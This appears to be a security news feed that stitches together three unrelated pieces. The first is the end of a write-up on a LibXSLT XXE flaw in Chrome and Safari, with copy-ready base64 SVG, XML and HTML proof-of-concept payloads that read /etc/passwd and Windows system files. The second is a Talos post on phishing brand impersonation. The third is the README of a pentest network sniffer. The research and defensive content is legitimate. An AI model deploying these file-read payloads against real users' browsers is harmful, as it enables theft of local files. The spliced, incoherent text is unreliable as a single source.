<?xml version="1.0" encoding="UTF-8"?>
<xsl:stylesheet  version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
  <xsl:template match="/">
    <xsl:copy-of select="document('file:///etc/passwd')"/>
  </xsl:template>
</xsl:stylesheet>

XXE

Using an edited ChatGPT output, I crafted an XSL file that combined the document() function with XML External Entities in the argument’s file, utilizing the data protocol. Next, I inserted the content of the XSL file into an XML file, also using the data protocol.

When I opened my XML file via an HTTP URL from my mobile phone, I was shocked to see my iOS /etc/hosts file! Later, my friend Yaroslav Babin(a.k.a. @yarbabin) confirmed the same result on Android!

iOS + Safari
iOS + Safari
iOS + Safari
Android + Chrome
Android + Chrome
Android + Chrome

Next, I started testing offline HTML to PDF tools, and it turned out that file reading works there as well, despite their built-in restrictions.

There was no chance that this wasn’t a vulnerability!

Here is a photo of my Smart TV, where the file reading works as well:

I compiled a table summarizing all my tests:

Test ScenarioAccessible Files
Android + Chrome/etc/hosts
iOS + Safari/etc/group, /etc/hosts, /etc/passwd
Windows + Chrome–
Ubuntu + Chrome–
PlayStation 4 + Chrome–
Samsung TV + Chrome/etc/group, /etc/hosts, /etc/passwd

The likely root cause of this discrepancy is the differences between sandboxes. Running Chrome on Windows or Linux with the --no-sandbox attribute allows reading arbitrary files as the current user.

Other Tests

I have tested some applications that use LibXSLT and don’t have sandboxes.

AppResult
PHPApplications that allow control over XSLTProcessor::importStylesheet data can be affected.
XMLSECThe document() function did not allow http(s):// and data: URLs.
OracleThe document() function did not allow http(s):// and data: URLs.
PostgreSQLThe document() function did not allow http(s):// and data: URLs.

The default PHP configuration disables parsing of external entities XML and XSL documents. However, this does not affect XML documents loaded by the document() function, and PHP allows the reading of arbitrary files using LibXSLT.

According to my tests, calling libxml_set_external_entity_loader(function ($a) {}); is sufficient to prevent the attack.

POCs

You will find all the POCs in a ZIP archive at the end of this section. Note that these are not zero-day POCs; details on reporting to the vendor and bounty information will be also provided later.

First, I created a simple HTML page with multiple <iframe> elements to test all possible file read functionalities and all possible ways to chain them:

The result of opening the xxe_all_tests/test.html page in an outdated Chrome

Open this page in Chrome, Safari, or Electron-like apps. It may read system files with default sandbox settings; without the sandbox, it may read arbitrary files with the current user’s rights.

As you can see now, only one of the call chains leads to an XXE in Chrome, and we were very fortunate to find it. Here is my schematic of the chain for better understanding:

Next, I created minified XML, SVG, and HTML POCs that you can copy directly from the article.

poc.svg
<?xml version="1.0" encoding="UTF-8"?>
<?xml-stylesheet type="text/xsl" href="data:text/xml;base64,PHhzbDpzdHlsZXNoZWV0IHZlcnNpb249IjEuMCIgeG1sbnM6eHNsPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L1hTTC9UcmFuc2Zvcm0iIHhtbG5zOnVzZXI9Imh0dHA6Ly9teWNvbXBhbnkuY29tL215bmFtZXNwYWNlIj4KPHhzbDpvdXRwdXQgbWV0aG9kPSJ4bWwiLz4KPHhzbDp0ZW1wbGF0ZSBtYXRjaD0iLyI+CjxzdmcgeG1sbnM9Imh0dHA6Ly93d3cudzMub3JnLzIwMDAvc3ZnIj4KPGZvcmVpZ25PYmplY3Qgd2lkdGg9IjMwMCIgaGVpZ2h0PSI2MDAiPgo8ZGl2IHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hodG1sIj4KTGlicmFyeTogPHhzbDp2YWx1ZS1vZiBzZWxlY3Q9InN5c3RlbS1wcm9wZXJ0eSgneHNsOnZlbmRvcicpIiAvPjx4c2w6dmFsdWUtb2Ygc2VsZWN0PSJzeXN0ZW0tcHJvcGVydHkoJ3hzbDp2ZXJzaW9uJykiIC8+PGJyIC8+IApMb2NhdGlvbjogPHhzbDp2YWx1ZS1vZiBzZWxlY3Q9InVucGFyc2VkLWVudGl0eS11cmkoLyovQGxvY2F0aW9uKSIgLz4gIDxici8+ClhTTCBkb2N1bWVudCgpIFhYRTogCjx4c2w6Y29weS1vZiAgc2VsZWN0PSJkb2N1bWVudCgnZGF0YTosJTNDJTNGeG1sJTIwdmVyc2lvbiUzRCUyMjEuMCUyMiUyMGVuY29kaW5nJTNEJTIyVVRGLTglMjIlM0YlM0UlMEElM0MlMjFET0NUWVBFJTIweHhlJTIwJTVCJTIwJTNDJTIxRU5USVRZJTIweHhlJTIwU1lTVEVNJTIwJTIyZmlsZTovLy9ldGMvcGFzc3dkJTIyJTNFJTIwJTVEJTNFJTBBJTNDeHhlJTNFJTBBJTI2eHhlJTNCJTBBJTNDJTJGeHhlJTNFJykiLz4KPC9kaXY+CjwvZm9yZWlnbk9iamVjdD4KPC9zdmc+CjwveHNsOnRlbXBsYXRlPgo8L3hzbDpzdHlsZXNoZWV0Pg=="?>
<!DOCTYPE svg [  
    <!ENTITY ent SYSTEM "?" NDATA aaa>  
]>
<svg location="ent" />
poc.xml
<?xml version="1.0" encoding="UTF-8"?>
<?xml-stylesheet type="text/xsl" href="data:text/xml;base64,PHhzbDpzdHlsZXNoZWV0IHZlcnNpb249IjEuMCIgeG1sbnM6eHNsPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L1hTTC9UcmFuc2Zvcm0iIHhtbG5zOnVzZXI9Imh0dHA6Ly9teWNvbXBhbnkuY29tL215bmFtZXNwYWNlIj4KPHhzbDpvdXRwdXQgdHlwZT0iaHRtbCIvPgo8eHNsOnRlbXBsYXRlIG1hdGNoPSJ0ZXN0MSI+CjxodG1sPgpMaWJyYXJ5OiA8eHNsOnZhbHVlLW9mIHNlbGVjdD0ic3lzdGVtLXByb3BlcnR5KCd4c2w6dmVuZG9yJykiIC8+PHhzbDp2YWx1ZS1vZiBzZWxlY3Q9InN5c3RlbS1wcm9wZXJ0eSgneHNsOnZlcnNpb24nKSIgLz48YnIgLz4gCkxvY2F0aW9uOiA8eHNsOnZhbHVlLW9mIHNlbGVjdD0idW5wYXJzZWQtZW50aXR5LXVyaShAbG9jYXRpb24pIiAvPiAgPGJyLz4KWFNMIGRvY3VtZW50KCkgWFhFOiAKPHhzbDpjb3B5LW9mICBzZWxlY3Q9ImRvY3VtZW50KCdkYXRhOiwlM0MlM0Z4bWwlMjB2ZXJzaW9uJTNEJTIyMS4wJTIyJTIwZW5jb2RpbmclM0QlMjJVVEYtOCUyMiUzRiUzRSUwQSUzQyUyMURPQ1RZUEUlMjB4eGUlMjAlNUIlMjAlM0MlMjFFTlRJVFklMjB4eGUlMjBTWVNURU0lMjAlMjJmaWxlOi8vL2V0Yy9wYXNzd2QlMjIlM0UlMjAlNUQlM0UlMEElM0N4eGUlM0UlMEElMjZ4eGUlM0IlMEElM0MlMkZ4eGUlM0UnKSIvPgo8L2h0bWw+CjwveHNsOnRlbXBsYXRlPgo8L3hzbDpzdHlsZXNoZWV0Pg=="?>
<!DOCTYPE test [  
    <!ENTITY ent SYSTEM "?" NDATA aaa>  
]>
<test1 location="ent"/>
poc.html
<html>
<head>
<title>LibXSLT document() XXE tests</title>
</head>
<body>
SVG<br/>
<iframe src=""></iframe><br/>
SVG WIN<br/>
<iframe src=""></iframe><br/>
XML<br/>
<iframe src="data:text/xml;base64,PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz4KPD94bWwtc3R5bGVzaGVldCB0eXBlPSJ0ZXh0L3hzbCIgaHJlZj0iZGF0YTp0ZXh0L3htbDtiYXNlNjQsUEhoemJEcHpkSGxzWlhOb1pXVjBJSFpsY25OcGIyNDlJakV1TUNJZ2VHMXNibk02ZUhOc1BTSm9kSFJ3T2k4dmQzZDNMbmN6TG05eVp5OHhPVGs1TDFoVFRDOVVjbUZ1YzJadmNtMGlJSGh0Ykc1ek9uVnpaWEk5SW1oMGRIQTZMeTl0ZVdOdmJYQmhibmt1WTI5dEwyMTVibUZ0WlhOd1lXTmxJajRLUEhoemJEcHZkWFJ3ZFhRZ2RIbHdaVDBpYUhSdGJDSXZQZ284ZUhOc09uUmxiWEJzWVhSbElHMWhkR05vUFNKMFpYTjBNU0krQ2p4b2RHMXNQZ3BNYVdKeVlYSjVPaUE4ZUhOc09uWmhiSFZsTFc5bUlITmxiR1ZqZEQwaWMzbHpkR1Z0TFhCeWIzQmxjblI1S0NkNGMydzZkbVZ1Wkc5eUp5a2lJQzgrUEhoemJEcDJZV3gxWlMxdlppQnpaV3hsWTNROUluTjVjM1JsYlMxd2NtOXdaWEowZVNnbmVITnNPblpsY25OcGIyNG5LU0lnTHo0OFluSWdMejRnQ2t4dlkyRjBhVzl1T2lBOGVITnNPblpoYkhWbExXOW1JSE5sYkdWamREMGlkVzV3WVhKelpXUXRaVzUwYVhSNUxYVnlhU2hBYkc5allYUnBiMjRwSWlBdlBpQWdQR0p5THo0S1dGTk1JR1J2WTNWdFpXNTBLQ2tnV0ZoRk9pQUtQSGh6YkRwamIzQjVMVzltSUNCelpXeGxZM1E5SW1SdlkzVnRaVzUwS0Nka1lYUmhPaXdsTTBNbE0wWjRiV3dsTWpCMlpYSnphVzl1SlRORUpUSXlNUzR3SlRJeUpUSXdaVzVqYjJScGJtY2xNMFFsTWpKVlZFWXRPQ1V5TWlVelJpVXpSU1V3UVNVelF5VXlNVVJQUTFSWlVFVWxNakI0ZUdVbE1qQWxOVUlsTWpBbE0wTWxNakZGVGxSSlZGa2xNakI0ZUdVbE1qQlRXVk5VUlUwbE1qQWxNakptYVd4bE9pOHZMMlYwWXk5d1lYTnpkMlFsTWpJbE0wVWxNakFsTlVRbE0wVWxNRUVsTTBONGVHVWxNMFVsTUVFbE1qWjRlR1VsTTBJbE1FRWxNME1sTWtaNGVHVWxNMFVuS1NJdlBnbzhMMmgwYld3K0Nqd3ZlSE5zT25SbGJYQnNZWFJsUGdvOEwzaHpiRHB6ZEhsc1pYTm9aV1YwUGc9PSI/Pgo8IURPQ1RZUEUgdGVzdCBbICAKICAgIDwhRU5USVRZIGVudCBTWVNURU0gIj8iIE5EQVRBIGFhYT4gICAKXT4KPHRlc3QxIGxvY2F0aW9uPSJlbnQiLz4="></iframe><br/>
XML WIN<br/>
<iframe src="data:text/xml;base64,PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz4KPD94bWwtc3R5bGVzaGVldCB0eXBlPSJ0ZXh0L3hzbCIgaHJlZj0iZGF0YTp0ZXh0L3htbDtiYXNlNjQsUEhoemJEcHpkSGxzWlhOb1pXVjBJSFpsY25OcGIyNDlJakV1TUNJZ2VHMXNibk02ZUhOc1BTSm9kSFJ3T2k4dmQzZDNMbmN6TG05eVp5OHhPVGs1TDFoVFRDOVVjbUZ1YzJadmNtMGlJSGh0Ykc1ek9uVnpaWEk5SW1oMGRIQTZMeTl0ZVdOdmJYQmhibmt1WTI5dEwyMTVibUZ0WlhOd1lXTmxJajRLUEhoemJEcHZkWFJ3ZFhRZ2RIbHdaVDBpYUhSdGJDSXZQZ284ZUhOc09uUmxiWEJzWVhSbElHMWhkR05vUFNKMFpYTjBNU0krQ2p4b2RHMXNQZ3BNYVdKeVlYSjVPaUE4ZUhOc09uWmhiSFZsTFc5bUlITmxiR1ZqZEQwaWMzbHpkR1Z0TFhCeWIzQmxjblI1S0NkNGMydzZkbVZ1Wkc5eUp5a2lJQzgrSmlONE1qQTdQSGh6YkRwMllXeDFaUzF2WmlCelpXeGxZM1E5SW5ONWMzUmxiUzF3Y205d1pYSjBlU2duZUhOc09uWmxjbk5wYjI0bktTSWdMejQ4WW5JZ0x6NGdDa3h2WTJGMGFXOXVPaUE4ZUhOc09uWmhiSFZsTFc5bUlITmxiR1ZqZEQwaWRXNXdZWEp6WldRdFpXNTBhWFI1TFhWeWFTaEFiRzlqWVhScGIyNHBJaUF2UGlBZ1BHSnlMejRLV0ZOTUlHUnZZM1Z0Ym1WMEtDa2dXRmhGT2lBS1BIaHpiRHBqYjNCNUxXOW1JQ0J6Wld4bFkzUTlJbVJ2WTNWdFpXNTBLQ2RrWVhSaE9pd2xNME1sTTBaNGJXd2xNakIyWlhKemFXOXVKVE5FSlRJeU1TNHdKVEl5SlRJd1pXNWpiMlJwYm1jbE0wUWxNakpWVkVZdE9DVXlNaVV6UmlVelJTVXdRU1V6UXlVeU1VUlBRMVJaVUVVbE1qQjRlR1VsTWpBbE5VSWxNakFsTTBNbE1qRkZUbFJKVkZrbE1qQjRlR1VsTWpCVFdWTlVSVTBsTWpBbE1qSm1hV3hsT2k4dkwyTTZMM2RwYm1SdmQzTXZjM2x6ZEdWdExtbHVhU1V5TWlVelJTVXlNQ1UxUkNVelJTVXdRU1V6UTNoNFpTVXpSU1V3UVNVeU5uaDRaU1V6UWlVd1FTVXpReVV5Um5oNFpTVXpSU2NwSWk4K0Nqd3ZhSFJ0YkQ0S1BDOTRjMnc2ZEdWdGNHeGhkR1UrQ2p3dmVITnNPbk4wZVd4bGMyaGxaWFErIj8+CjwhRE9DVFlQRSB0ZXN0IFsgIAogICAgPCFFTlRJVFkgZW50IFNZU1RFTSAiPyIgTkRBVEEgYWFhPiAgIApdPgo8dGVzdDEgbG9jYXRpb249ImVudCIvPg=="></iframe><br/>
</body>

ZIP archive for testing: libxslt.zip.

The Bounty

All findings were immediately reported to the vendors.

Safari

Apple implemented the sandbox patch. Assigned CVE: CVE-2023-40415. Reward: $25,000. πŸ’°

Chrome

Google implemented the patch and enforced security for documents loaded by the XSL’s document() function. Assigned CVE: CVE-2023-4357. Reward: $3,000. πŸ’Έ

Links

Feel free to write your thoughts about the article on our X page. Follow @ptswarmΒ so you don’t miss our future research and other publications.

From trust to trickery: Brand impersonation over the email attack vector

22 May 2024 at 12:17
  • Cisco recently developed and released a new feature to detect brand impersonation in emails when adversaries pretend to be a legitimate corporation.
  • Talos has discovered a wide range of techniques threat actors use to embed and deliver brand logos via emails to their victims.
  • Talos is providing new statistics and insights into detected brand impersonation cases over one month (March - April 2024).
  • In addition to deploying Cisco Secure Email, user education is key to detecting this type of threat.
From trust to trickery: Brand impersonation over the email attack vector

Brand impersonation could happen on many online platforms, including social media, websites, emails and mobile applications. This type of threat exploits the familiarity and legitimacy of popular brand logos to solicit sensitive information from victims. In the context of email security, brand impersonation is commonly observed in phishing emails. Threat actors want to deceive their victims into giving up their credentials or other sensitive information by abusing the popularity of well-known brands.

Brand logo embedding and delivery techniques

Threat actors employ a variety of techniques to embed brand logos within emails. One simple method involves inserting words associated with the brand into the HTML source of the email. In the example below, the PayPal logo can be found in plaintext in the HTML source of this email.

From trust to trickery: Brand impersonation over the email attack vector
An example email impersonating the PayPal brand.
From trust to trickery: Brand impersonation over the email attack vector
Creating the PayPal logo via HTML.

Sometimes, the email body is base64-encoded to make their detection harder. The base64-encoded snippet of an email body is shown below.

From trust to trickery: Brand impersonation over the email attack vector
An example email impersonating the Microsoft brand.
From trust to trickery: Brand impersonation over the email attack vector
A snippet of the base64-encoded body of the above email.

The decoded HTML code is shown in the figure below. In this case, the Microsoft logo has been built via an HTML 2x2 table with four cells and various background colors.

From trust to trickery: Brand impersonation over the email attack vector
Creating the Microsoft logo via HTML.

A more advanced technique is to fetch the brand logo from remote servers at delivery time. In this technique, the URI of the resource is embedded in the HTML source of the email, either in plain text or Base64-encoded. The logo in the example below is fetched from the below address:
hxxps://image[.]member.americanexpress[.]com/.../AMXIMG_250x250_amex_logo.jpg

From trust to trickery: Brand impersonation over the email attack vector
An example email impersonating the American Express brand.
From trust to trickery: Brand impersonation over the email attack vector
The URI from which the American Express brand is being loaded.

Another technique threat actors use is to deliver the brand logo via attachments. One of the most common techniques is to only include the brand logo as an image attachment. In this case, the logo is normally base64-encoded to evade detection. Email clients automatically fetch and render these logos if they’re referenced from the HTML source of the email. In this example, the Microsoft logo is attached to this email as a PNG file and referenced in an <img> HTML tag.

From trust to trickery: Brand impersonation over the email attack vector
An example email impersonating the Microsoft brand (the logo is attached to the email and is rendered and shown to the victim at delivery time via <img> HTML tag).
From trust to trickery: Brand impersonation over the email attack vector
The Content-ID (CID) reference of the attached Microsoft brand logo is included inline in the HTML source of the above email.

In other cases, the whole email body, including the brand logo, is attached as an image to the email and is shown to the victim by the email client. The example below is a brand impersonation case where the whole body is included in the PNG attachment, named β€œshark.png”. Also, an β€œinline” keyword can be seen in the HTML source of this email. When Content-Disposition is set to "inline," it indicates that the attached content should be displayed within the body of the email itself, rather than being treated as a downloadable attachment.

From trust to trickery: Brand impersonation over the email attack vector
An example email impersonating the Microsoft Office 365 brand (the whole email body, including the brand logo, is attached to the email as a PNG file).
From trust to trickery: Brand impersonation over the email attack vector
The whole email body is in the attachment and is included in the above message.

A brand logo may also be embedded within a PDF attachment. In the example shown below, the whole email body is included in a PDF attachment. This email is a QR code phishing email that is also impersonating the Bluebeam brand.

From trust to trickery: Brand impersonation over the email attack vector
An example email impersonating the Bluebeam brand (the whole email body, including the brand logo, is attached to the email as a PDF file).
From trust to trickery: Brand impersonation over the email attack vector
The whole email body is included in a PDF attachment.

The scope of brand impersonation

An efficient brand impersonation detection engine plays a key role in an email security product. The extracted information from correctly convicted emails is valuable for threat researchers and customers. Using Cisco Secure Email Threat Defense’s brand impersonation detection engine, we uncovered the true scope of how widespread these attacks are. All data reflects the period between March 22 and April 22, 2024.

Threat researchers can use this information to block future attacks, potentially based on the sender’s email address and domain, the originating IP addresses of brand impersonation attacks, their attachments, the URLs found from such emails, and even phone numbers.

The chart below demonstrates the top sender domains of emails curated by attackers to convince the victims to call a number (i.e., as in Telephone-Oriented Attack Delivery) by impersonating the Best Buy Geek Squad, Norton and PayPal brands. Free email services are widely used by adversaries to send such emails. However, other domains can also be found that are less popular.

From trust to trickery: Brand impersonation over the email attack vector
Top sender domains of emails impersonating Best Buy Geek Squad, Norton and PayPal brands.

Sometimes, similar brand impersonation emails are sent from a wide range of domains. For example, as shown in the below heatmap, emails impersonating the DocuSign brand were sent from two different domains to our customers on March 28. In other cases, emails are sent from a single domain (e.g., emails impersonating Geek Squad and McAfee brands).

From trust to trickery: Brand impersonation over the email attack vector
Count of convictions by the impersonated brand and sender domain on March 28.(Note: This is only a subset of convictions we had on this date.)

Brand impersonation emails may target specific industry verticals, or they might be sent indiscriminately. As shown in the chart below, four brand impersonation emails from hotmail.com and softbased.top domains were sent to our customers that would be categorized as either educational or insurance companies. On the other hand, emails from biglobe.ne.jp targeted a wider range of industry verticals.

From trust to trickery: Brand impersonation over the email attack vector
Count of convictions by industry verticals from different sender domains on April 2nd (note: this is only a subset of convictions we had in this date).

Cisco customers can also benefit from information provided by the brand impersonation detection engine. By sharing the list of the most frequently impersonated brands with them regularly, they can train their employees to stay vigilant when they observe specific brands in emails.

From trust to trickery: Brand impersonation over the email attack vector
Top 30 impersonated brands over one month.

Microsoft was the most frequently impersonated brand over the month we observed, followed by DocuSign. Most emails that contained these brands were fake SharePoint and DocuSign phishing messages. Two examples are provided below.

From trust to trickery: Brand impersonation over the email attack vector

Other top frequently impersonated brands such as NortonLifeLock, PayPal, Chase, Geek Squad and Walmart were mostly seen in callback phishing messages. In this technique, the attackers include a phone number in the email and try to persuade recipients to call that number, thereby changing the communication channel away from email. From there, they may send another link to their victims to deliver different types of malware. The attackers normally do so by impersonating well-known and familiar brands. Two examples of such emails are provided below.

From trust to trickery: Brand impersonation over the email attack vector

Protect against brand impersonation

Strengthening the weakest link

Humans are still the weakest link in cybersecurity. Therefore, educating users is of paramount importance to reduce the amount and effects of security breaches. Educating people does not only concern employees within a specific organization but in this case, it also involves their customers.

Employees should know an organization’s trusted partners and the way that their organization communicates with them. This way, when an anomaly occurs in that form of communication, they will be able to identify any issues faster. Customers need different communication methods that your organization would use to contact them. Also, they need to be provided with the type of information you will be asking for. When they know these two vital details, they will be less likely to share their sensitive information over abnormal communication platforms (e.g., through emails or text messages).

Brand impersonation techniques are evolving in terms of sophistication, and differentiating fake emails from legitimate ones by a human or even a security researcher demands more time and effort. Therefore, more advanced techniques are required to detect these types of threats.

Asset protection

Well-known brands can protect themselves from this type of threat through asset protection as well. Domain names can be registered with various extensions to thwart threat actors attempting to use similar domains for malicious purposes. The other crucial step brands can take is to conceal their information from WHOIS records via privacy protection. Last, but not least, domain names need to be updated regularly since expired domains can be easily abused by threat actors for illicit activities that can harm your business reputation. Brand names should be registered properly so that your organization can take legal action when a brand impersonation occurs.

Advanced detection methods

Detection methods can be improved to delay the exposure of users to the received emails. Machine learning has improved significantly over the past few years due to advancements in computing resources, the availability of data, and the introduction of new machine learning architectures. Machine learning-based security solutions can be leveraged to improve detection efficacy.

Cisco Talos relies on a wide range of systems to detect this type of threat and protect our customers, from rule-based engines to advanced ML-based systems. Learn more about Cisco Secure Email Threat Defense's new brand impersonation detection tools here.

Above - Invisible Network Protocol Sniffer


Invisible protocol sniffer for finding vulnerabilities in the network. Designed for pentesters and security engineers.


Above: Invisible network protocol sniffer
Designed for pentesters and security engineers

Author: Magama Bazarov, <[email protected]>
Pseudonym: Caster
Version: 2.6
Codename: Introvert

Disclaimer

All information contained in this repository is provided for educational and research purposes only. The author is not responsible for any illegal use of this tool.

It is a specialized network security tool that helps both pentesters and security professionals.

Mechanics

Above is a invisible network sniffer for finding vulnerabilities in network equipment. It is based entirely on network traffic analysis, so it does not make any noise on the air. He's invisible. Completely based on the Scapy library.

Above allows pentesters to automate the process of finding vulnerabilities in network hardware. Discovery protocols, dynamic routing, 802.1Q, ICS Protocols, FHRP, STP, LLMNR/NBT-NS, etc.

Supported protocols

Detects up to 27 protocols:

MACSec (802.1X AE)
EAPOL (Checking 802.1X versions)
ARP (Passive ARP, Host Discovery)
CDP (Cisco Discovery Protocol)
DTP (Dynamic Trunking Protocol)
LLDP (Link Layer Discovery Protocol)
802.1Q Tags (VLAN)
S7COMM (Siemens)
OMRON
TACACS+ (Terminal Access Controller Access Control System Plus)
ModbusTCP
STP (Spanning Tree Protocol)
OSPF (Open Shortest Path First)
EIGRP (Enhanced Interior Gateway Routing Protocol)
BGP (Border Gateway Protocol)
VRRP (Virtual Router Redundancy Protocol)
HSRP (Host Standby Redundancy Protocol)
GLBP (Gateway Load Balancing Protocol)
IGMP (Internet Group Management Protocol)
LLMNR (Link Local Multicast Name Resolution)
NBT-NS (NetBIOS Name Service)
MDNS (Multicast DNS)
DHCP (Dynamic Host Configuration Protocol)
DHCPv6 (Dynamic Host Configuration Protocol v6)
ICMPv6 (Internet Control Message Protocol v6)
SSDP (Simple Service Discovery Protocol)
MNDP (MikroTik Neighbor Discovery Protocol)

Operating Mechanism

Above works in two modes:

  • Hot mode: Sniffing on your interface specifying a timer
  • Cold mode: Analyzing traffic dumps

The tool is very simple in its operation and is driven by arguments:

  • Interface: Specifying the network interface on which sniffing will be performed
  • Timer: Time during which traffic analysis will be performed
  • Input: The tool takes an already prepared .pcap as input and looks for protocols in it
  • Output: Above will record the listened traffic to .pcap file, its name you specify yourself
  • Passive ARP: Detecting hosts in a segment using Passive ARP
usage: above.py [-h] [--interface INTERFACE] [--timer TIMER] [--output OUTPUT] [--input INPUT] [--passive-arp]

options:
-h, --help show this help message and exit
--interface INTERFACE
Interface for traffic listening
--timer TIMER Time in seconds to capture packets, if not set capture runs indefinitely
--output OUTPUT File name where the traffic will be recorded
--input INPUT File name of the traffic dump
--passive-arp Passive ARP (Host Discovery)

Information about protocols

The information obtained will be useful not only to the pentester, but also to the security engineer, he will know what he needs to pay attention to.

When Above detects a protocol, it outputs the necessary information to indicate the attack vector or security issue:

  • Impact: What kind of attack can be performed on this protocol;

  • Tools: What tool can be used to launch an attack;

  • Technical information: Required information for the pentester, sender MAC/IP addresses, FHRP group IDs, OSPF/EIGRP domains, etc.

  • Mitigation: Recommendations for fixing the security problems

  • Source/Destination Addresses: For protocols, Above displays information about the source and destination MAC addresses and IP addresses


Installation

Linux

You can install Above directly from the Kali Linux repositories

caster@kali:~$ sudo apt update && sudo apt install above

Or...

caster@kali:~$ sudo apt-get install python3-scapy python3-colorama python3-setuptools
caster@kali:~$ git clone https://github.com/casterbyte/Above
caster@kali:~$ cd Above/
caster@kali:~/Above$ sudo python3 setup.py install

macOS:

# Install python3 first
brew install python3
# Then install required dependencies
sudo pip3 install scapy colorama setuptools

# Clone the repo
git clone https://github.com/casterbyte/Above
cd Above/
sudo python3 setup.py install

Don't forget to deactivate your firewall on macOS!

Settings > Network > Firewall


How to Use

Hot mode

Above requires root access for sniffing

Above can be run with or without a timer:

caster@kali:~$ sudo above --interface eth0 --timer 120

To stop traffic sniffing, press CTRL + Π‘

WARNING! Above is not designed to work with tunnel interfaces (L3) due to the use of filters for L2 protocols. Tool on tunneled L3 interfaces may not work properly.

Example:

caster@kali:~$ sudo above --interface eth0 --timer 120

-----------------------------------------------------------------------------------------
[+] Start sniffing...

[*] After the protocol is detected - all necessary information about it will be displayed
--------------------------------------------------
[+] Detected SSDP Packet
[*] Attack Impact: Potential for UPnP Device Exploitation
[*] Tools: evil-ssdp
[*] SSDP Source IP: 192.168.0.251
[*] SSDP Source MAC: 02:10:de:64:f2:34
[*] Mitigation: Ensure UPnP is disabled on all devices unless absolutely necessary, monitor UPnP traffic
--------------------------------------------------
[+] Detected MDNS Packet
[*] Attack Impact: MDNS Spoofing, Credentials Interception
[*] Tools: Responder
[*] MDNS Spoofing works specifically against Windows machines
[*] You cannot get NetNTLMv2-SSP from Apple devices
[*] MDNS Speaker IP: fe80::183f:301c:27bd:543
[*] MDNS Speaker MAC: 02:10:de:64:f2:34
[*] Mitigation: Filter MDNS traffic. Be careful with MDNS filtering
--------------------------------------------------

If you need to record the sniffed traffic, use the --output argument

caster@kali:~$ sudo above --interface eth0 --timer 120 --output above.pcap

If you interrupt the tool with CTRL+C, the traffic is still written to the file

Cold mode

If you already have some recorded traffic, you can use the --input argument to look for potential security issues

caster@kali:~$ above --input ospf-md5.cap

Example:

caster@kali:~$ sudo above --input ospf-md5.cap

[+] Analyzing pcap file...

--------------------------------------------------
[+] Detected OSPF Packet
[+] Attack Impact: Subnets Discovery, Blackhole, Evil Twin
[*] Tools: Loki, Scapy, FRRouting
[*] OSPF Area ID: 0.0.0.0
[*] OSPF Neighbor IP: 10.0.0.1
[*] OSPF Neighbor MAC: 00:0c:29:dd:4c:54
[!] Authentication: MD5
[*] Tools for bruteforce: Ettercap, John the Ripper
[*] OSPF Key ID: 1
[*] Mitigation: Enable passive interfaces, use authentication
--------------------------------------------------
[+] Detected OSPF Packet
[+] Attack Impact: Subnets Discovery, Blackhole, Evil Twin
[*] Tools: Loki, Scapy, FRRouting
[*] OSPF Area ID: 0.0.0.0
[*] OSPF Neighbor IP: 192.168.0.2
[*] OSPF Neighbor MAC: 00:0c:29:43:7b:fb
[!] Authentication: MD5
[*] Tools for bruteforce: Ettercap, John the Ripper
[*] OSPF Key ID: 1
[*] Mitigation: Enable passive interfaces, use authentication

Passive ARP

The tool can detect hosts without noise in the air by processing ARP frames in passive mode

caster@kali:~$ sudo above --interface eth0 --passive-arp --timer 10

[+] Host discovery using Passive ARP

--------------------------------------------------
[+] Detected ARP Reply
[*] ARP Reply for IP: 192.168.1.88
[*] MAC Address: 00:00:0c:07:ac:c8
--------------------------------------------------
[+] Detected ARP Reply
[*] ARP Reply for IP: 192.168.1.40
[*] MAC Address: 00:0c:29:c5:82:81
--------------------------------------------------

Outro

I wrote this tool because of the track "A View From Above (Remix)" by KOAN Sound. This track was everything to me when I was working on this sniffer.




Before yesterdayMain stream
❌
❌